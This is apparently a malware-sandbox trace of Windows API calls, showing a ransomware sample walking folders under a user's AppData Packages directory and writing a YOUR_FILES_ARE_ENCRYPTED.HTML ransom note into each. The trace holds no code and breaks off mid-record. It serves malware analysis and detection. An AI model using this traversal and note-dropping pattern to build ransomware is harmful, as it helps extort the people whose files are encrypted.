1 [0115.698] CloseHandle (hObject=0x320) returned 1 [0115.698] GetProcessHeap () returned 0x600000 [0115.698] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.698] GetProcessHeap () returned 0x600000 [0115.698] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0115.699] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a6e8e8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x9c03d9b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x9c03d9b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.ConnectivityStore_8wekyb3d8bbwe", cAlternateFileName="MICROS~2.CON")) returned 1 [0115.699] StrStrIW (lpFirst="Microsoft.ConnectivityStore_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.699] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe") returned 90 [0115.699] GetProcessHeap () returned 0x600000 [0115.699] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0115.700] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe" [0115.700] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\*" [0115.700] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a6e8e8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x9c03d9b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x9c03d9b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626838 [0115.703] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a6e8e8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x9c03d9b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x9c03d9b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0115.703] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x949077c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x95756ec, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x95756ec, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0115.703] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.703] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC") returned 93 [0115.704] GetProcessHeap () returned 0x600000 [0115.705] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.705] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC" [0115.705] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\*" [0115.705] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x949077c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x95756ec, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x95756ec, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.710] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x949077c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x95756ec, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x95756ec, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0115.710] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x95756ec, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x95756ec, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x95756ec, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0115.710] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.710] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetCache") returned 103 [0115.710] GetProcessHeap () returned 0x600000 [0115.710] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.739] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetCache" [0115.739] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetCache\\*" [0115.739] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x95756ec, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x95756ec, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x95756ec, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626978 [0115.740] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x95756ec, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x95756ec, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x95756ec, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0115.740] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x95756ec, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x95756ec, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x95756ec, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0115.740] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0115.740] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 133 [0115.740] GetProcessHeap () returned 0x600000 [0115.740] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.742] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.connectivitystore_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.743] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.744] CloseHandle (hObject=0x214) returned 1 [0115.744] GetProcessHeap () returned 0x600000 [0115.744] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.744] GetProcessHeap () returned 0x600000 [0115.744] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.744] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x95756ec, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x95756ec, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x95756ec, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0115.744] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.744] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetCookies") returned 105 [0115.744] GetProcessHeap () returned 0x600000 [0115.744] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.744] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetCookies" [0115.744] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0115.744] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x95756ec, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x95756ec, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x95756ec, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.745] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x95756ec, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x95756ec, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x95756ec, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0115.745] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x95756ec, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x95756ec, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x95756ec, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0115.745] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.745] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 135 [0115.745] GetProcessHeap () returned 0x600000 [0115.745] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.745] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.connectivitystore_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.746] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.747] CloseHandle (hObject=0x214) returned 1 [0115.747] GetProcessHeap () returned 0x600000 [0115.747] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.747] GetProcessHeap () returned 0x600000 [0115.747] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.747] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x95756ec, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x95756ec, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x95756ec, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0115.747] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.747] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetHistory") returned 105 [0115.747] GetProcessHeap () returned 0x600000 [0115.747] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.747] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetHistory" [0115.747] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0115.747] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x95756ec, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x95756ec, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x95756ec, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.747] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x95756ec, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x95756ec, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x95756ec, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0115.747] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x95756ec, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x95756ec, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x95756ec, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0115.747] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.748] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 135 [0115.748] GetProcessHeap () returned 0x600000 [0115.748] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.748] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.connectivitystore_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.748] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.749] CloseHandle (hObject=0x214) returned 1 [0115.749] GetProcessHeap () returned 0x600000 [0115.749] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.749] GetProcessHeap () returned 0x600000 [0115.749] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.750] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95756ec, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x95756ec, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x95756ec, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="Temp", cAlternateFileName="")) returned 1 [0115.750] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.750] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\Temp") returned 98 [0115.750] GetProcessHeap () returned 0x600000 [0115.750] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.751] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\Temp" [0115.752] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\Temp\\*" [0115.752] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95756ec, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x95756ec, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x95756ec, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626878 [0115.752] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95756ec, ftCreationTime.dwHighDateTime=0x1d70074, 